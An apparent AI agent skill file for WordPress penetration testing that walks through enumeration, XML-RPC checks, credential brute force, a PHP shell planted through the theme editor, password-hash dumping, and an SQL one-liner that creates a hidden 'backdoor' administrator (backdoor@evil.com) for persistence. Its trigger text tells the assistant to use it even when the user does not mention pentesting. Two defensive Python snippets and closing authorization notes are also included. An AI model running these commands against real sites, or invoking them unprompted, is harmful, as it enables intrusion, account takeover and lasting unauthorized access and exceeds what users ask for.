Hacktricks-skills wordpress-pentest

Perform comprehensive WordPress security assessments including enumeration, vulnerability testing, and exploitation. Use this skill whenever the user needs to assess WordPress security, test for common WordPress vulnerabilities, enumerate WordPress sites, check for outdated plugins/themes, test XML-RPC attacks, or perform any WordPress-related penetration testing. Make sure to use this skill for any WordPress security testing, even if the user doesn't explicitly mention 'pentest' or 'security assessment'.

Install
Source: clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
Manifest: skills/network-services-pentesting/pentesting-web/wordpress/SKILL.MD

Source content

WordPress Pentesting Skill

A comprehensive skill for conducting WordPress security assessments, from initial enumeration through exploitation and post-exploitation.

When to Use This Skill

Use this skill when:

  • Assessing WordPress site security
  • Enumerating WordPress installations (version, plugins, themes, users)
  • Testing for common WordPress vulnerabilities
  • Checking for outdated or vulnerable plugins/themes
  • Testing XML-RPC functionality and attacks
  • Performing WordPress-specific penetration testing
  • Auditing WordPress configurations

Workflow Overview

  1. Reconnaissance - Gather information about the target
  2. Enumeration - Discover WordPress components and users
  3. Vulnerability Testing - Check for known vulnerabilities
  4. Exploitation - Attempt to gain access (if authorized)
  5. Post-Exploitation - Extract data and maintain access

Phase 1: Reconnaissance

Check WordPress Installation

First, verify the target is running WordPress:

# Check for WordPress-specific files
curl -I https://target.com/wp-login.php
curl -I https://target.com/wp-admin/
curl -I https://target.com/xmlrpc.php
curl -I https://target.com/wp-json/

Get WordPress Version

Use scripts/wp-enumerate.sh to extract version information:

./scripts/wp-enumerate.sh https://target.com

Manual methods:

# Check readme.html or license.txt
curl -s https://target.com/readme.html | grep -i version
curl -s https://target.com/license.txt | head -5

# Check meta tags
curl -s https://target.com/ | grep -i 'content="WordPress'

# Check CSS/JS version strings
curl -s https://target.com/ | grep -E 'wp-content.*ver='

Phase 2: Enumeration

Enumerate Plugins and Themes

Use the enumeration script:

./scripts/wp-enumerate.sh https://target.com --plugins --themes

Manual enumeration:

# Extract plugin slugs from page source (grep -o prints every match, not just the last one per line)
curl -s https://target.com/ | grep -oE "wp-content/plugins/[^/\"'>]+" | cut -d/ -f3 | sort -u

# Extract theme slugs from page source
curl -s https://target.com/ | grep -oE "wp-content/themes/[^/\"'>]+" | cut -d/ -f3 | sort -u

# Extract version strings (?ver= / &ver= query parameters on enqueued assets)
curl -s https://target.com/ | grep -oE "[?&]ver=[^&\"'>]+" | sed -E 's/^[?&]ver=//' | sort -u

User Enumeration

Use scripts/wp-user-enum.sh for automated user discovery:

./scripts/wp-user-enum.sh https://target.com

Manual methods:

# Author ID brute force (check IDs 1-50)
for i in {1..50}; do
  code=$(curl -s -o /dev/null -w "%{http_code}" "https://target.com/?author=$i")
  if [[ "$code" =~ ^[23][0-9][0-9]$ ]]; then
    echo "Valid user ID: $i"
  fi
done

# Check wp-json endpoint
curl -s https://target.com/wp-json/wp/v2/users/

# Check oembed endpoint (requires a post URL)
curl -s "https://target.com/wp-json/oembed/1.0/embed?url=https://target.com/sample-post/"

Check Login Paths

# Common WordPress login paths
for path in "/wp-login.php" "/wp-admin/" "/wp-admin/login.php" "/login/" "/login.php"; do
  code=$(curl -s -o /dev/null -w "%{http_code}" "https://target.com$path")
  echo "$path: $code"
done
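From the defender's side, the enumeration steps above leave a recognisable trail in the web server access log. The following Python, added here and not one of the skill's scripts, flags the author ID sweep, the REST user listing and version-file fingerprinting per client IP; the log lines and IP addresses are constructed samples in Common Log Format.

```python
# Flag the WordPress enumeration patterns described above in web server access logs.
import re
from collections import defaultdict

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')  # Common Log Format
AUTHOR_RE = re.compile(r"^/\?author=(\d+)$")           # author ID brute force
USER_REST_RE = re.compile(r"^/wp-json/wp/v2/users/?")  # REST user listing
FINGERPRINT_PATHS = {"/readme.html", "/license.txt", "/wp-config.php"}

# Constructed sample lines; 203.0.113.5 runs the workflow above, 198.51.100.9 is a normal visitor.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2024:13:55:01 +0000] "GET /readme.html HTTP/1.1" 200 7420',
] + [
    f'203.0.113.5 - - [10/Oct/2024:13:55:{2 + i:02d} +0000] "GET /?author={i} HTTP/1.1" '
    f'{"302" if i in (1, 2) else "404"} 0'
    for i in range(1, 9)
] + [
    '203.0.113.5 - - [10/Oct/2024:13:55:20 +0000] "GET /wp-json/wp/v2/users/ HTTP/1.1" 200 1893',
    '198.51.100.9 - - [10/Oct/2024:13:56:00 +0000] "GET / HTTP/1.1" 200 51230',
    '198.51.100.9 - - [10/Oct/2024:13:56:04 +0000] "GET /?author=1 HTTP/1.1" 302 0',
]


def detect_enumeration(lines, author_threshold=5):
    """Return {ip: [reasons]} for clients whose requests match the enumeration workflow."""
    per_ip = defaultdict(lambda: {"author_ids": set(), "rest_users": 0, "fingerprint": set()})
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line
        ip, _method, path, _status = m.groups()
        stats = per_ip[ip]
        if author := AUTHOR_RE.match(path):
            stats["author_ids"].add(author.group(1))
        elif USER_REST_RE.match(path):
            stats["rest_users"] += 1
        elif path in FINGERPRINT_PATHS:
            stats["fingerprint"].add(path)
    findings = {}
    for ip, s in per_ip.items():
        reasons = []
        if len(s["author_ids"]) >= author_threshold:  # one or two hits are normal traffic
            reasons.append(f"author ID sweep across {len(s['author_ids'])} IDs")
        if s["rest_users"]:
            reasons.append("REST API user listing (/wp-json/wp/v2/users)")
        if s["fingerprint"]:
            reasons.append("version fingerprinting: " + ", ".join(sorted(s["fingerprint"])))
        if reasons:
            findings[ip] = reasons
    return findings
```

Feed it real log lines (one string per line) and tune author_threshold to the site's normal author-archive traffic.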

Phase 3: Vulnerability Testing

XML-RPC Testing

Use scripts/wp-xmlrpc-test.sh to test XML-RPC functionality:

./scripts/wp-xmlrpc-test.sh https://target.com

Manual XML-RPC checks:

# Check if XML-RPC is enabled
curl -s -X POST https://target.com/xmlrpc.php \
  -H "Content-Type: application/xml" \
  -d '<methodCall><methodName>system.listMethods</methodName><params></params></methodCall>' | grep -i "system.listMethods"

# Check for pingback.ping (potential DDoS)
curl -s -X POST https://target.com/xmlrpc.php \
  -H "Content-Type: application/xml" \
  -d '<methodCall><methodName>system.listMethods</methodName><params></params></methodCall>' | grep -i "pingback.ping"
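The curl checks above grep the raw reply. The Python below, added here and not one of the skill's scripts, builds the same system.listMethods call with the standard library and parses the reply as XML-RPC, telling a method list apart from a fault and reporting an exposed pingback.ping; both reply bodies are constructed samples.

```python
"""Build the system.listMethods call used above and parse the reply as XML-RPC instead of grepping."""
import xmlrpc.client

# pingback.ping needs no credentials, so a site listing it can be used as a request reflector.
FLAGGED_METHODS = {"pingback.ping": "unauthenticated pingback.ping exposed (DDoS reflection)"}


def build_list_methods_request() -> bytes:
    """Same body as the curl -d payload above, produced by the stdlib marshaller."""
    return xmlrpc.client.dumps((), methodname="system.listMethods").encode()


def audit_list_methods_response(body: str) -> dict:
    """Classify an xmlrpc.php reply: a method list means enabled, a <fault> means refused."""
    try:
        (methods,), _ = xmlrpc.client.loads(body)
    except xmlrpc.client.Fault as fault:
        return {"enabled": False, "fault": f"{fault.faultCode}: {fault.faultString}", "flagged": []}
    methods = set(methods)
    return {
        "enabled": True,
        "method_count": len(methods),
        "flagged": [FLAGGED_METHODS[m] for m in sorted(FLAGGED_METHODS) if m in methods],
    }


# Constructed replies: one site with XML-RPC on, one answering every call with a fault.
ENABLED_REPLY = """<?xml version="1.0" encoding="UTF-8"?>
<methodResponse><params><param><value><array><data>
<value><string>system.listMethods</string></value>
<value><string>pingback.ping</string></value>
<value><string>wp.getUsersBlogs</string></value>
</data></array></value></param></params></methodResponse>"""

FAULT_REPLY = """<?xml version="1.0" encoding="UTF-8"?>
<methodResponse><fault><value><struct>
<member><name>faultCode</name><value><int>-32601</int></value></member>
<member><name>faultString</name><value><string>requested method not found</string></value></member>
</struct></value></fault></methodResponse>"""

if __name__ == "__main__":
    print(build_list_methods_request().decode())
    print(audit_list_methods_response(ENABLED_REPLY))
    print(audit_list_methods_response(FAULT_REPLY))
```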

Check for Known Vulnerabilities

Use scripts/wp-vuln-check.sh to scan for common vulnerabilities:

./scripts/wp-vuln-check.sh https://target.com

Test Common Attack Vectors

# Test wp-cron.php DoS potential
curl -s -o /dev/null -w "%{http_code}" https://target.com/wp-cron.php

# Test oembed proxy SSRF
curl -s "https://target.com/wp-json/oembed/1.0/proxy?url=http://your-collaborator.com"

# Check for exposed wp-config.php
curl -s https://target.com/wp-config.php | grep -i "DB_PASSWORD"

Phase 4: Exploitation

Credential Attacks

If you have valid usernames, test with common passwords:

# Using wpscan (requires API token)
wpscan --url https://target.com --api-token YOUR_TOKEN --passwords /path/to/wordlist.txt

# Using XML-RPC for credential brute force
./scripts/wp-xmlrpc-brute.sh https://target.com userlist.txt passlist.txt

Plugin Vulnerability Exploitation

Check for vulnerable plugins and use appropriate exploits:

# Check plugin versions against known vulnerabilities
./scripts/wp-vuln-check.sh https://target.com --detailed

# Common vulnerable plugins to check:
# - Litho Theme (file deletion)
# - WP Job Portal (SQLi, file download)
# - Jobmonster Theme (account takeover)
# - Motors Theme (plugin installation)
# - Depicter Slider (SQLi)
# - Kubio AI (LFI)

RCE via Theme Editor

If you have admin access:

# Upload shell via theme editor
# Navigate to: Appearance → Theme Editor → 404 Template
# Replace with PHP shell code

# Access the shell at:
# https://target.com/wp-content/themes/active-theme/404.php

Phase 5: Post-Exploitation

Extract User Data

# Extract usernames and password hashes
mysql -u <user> -p<pass> -h localhost -e "use wordpress; SELECT user_login, user_pass FROM wp_users;"

# Change admin password
mysql -u <user> -p<pass> -h localhost -e "use wordpress; UPDATE wp_users SET user_pass=MD5('newpassword') WHERE ID = 1;"

Maintain Access

# Create backdoor plugin
# Upload malicious plugin via dashboard
# Or modify theme files

# Create new admin user
mysql -u <user> -p<pass> -h localhost -e "use wordpress; INSERT INTO wp_users (user_login, user_pass, user_email, user_registered) VALUES ('backdoor', MD5('password'), 'backdoor@evil.com', NOW()); INSERT INTO wp_usermeta (user_id, meta_key, meta_value) SELECT ID, 'wp_capabilities', 'a:1:{s:13:\"administrator\";b:1;}' FROM wp_users WHERE user_login='backdoor';"

Security Recommendations

After assessment, recommend:

  1. Keep WordPress Updated
     • Enable auto-updates in wp-config.php
     • Regularly update plugins and themes
  2. Security Plugins
     • Wordfence Security
     • Sucuri Security
     • iThemes Security
  3. Hardening
     • Remove default admin user
     • Use strong passwords and 2FA
     • Limit login attempts
     • Disable XML-RPC if not needed
     • Rename wp-admin access

Scripts Reference

Script              Purpose
wp-enumerate.sh     Extract version, plugins, themes
wp-user-enum.sh     Enumerate WordPress users
wp-xmlrpc-test.sh   Test XML-RPC functionality
wp-xmlrpc-brute.sh  Brute force via XML-RPC
wp-vuln-check.sh    Check for known vulnerabilities

Important Notes

  • Authorization Required: Only perform these tests on systems you own or have explicit permission to test
  • Legal Compliance: Ensure all testing complies with applicable laws and regulations
  • Documentation: Document all findings and maintain evidence
  • Responsible Disclosure: Report vulnerabilities to site owners appropriately

References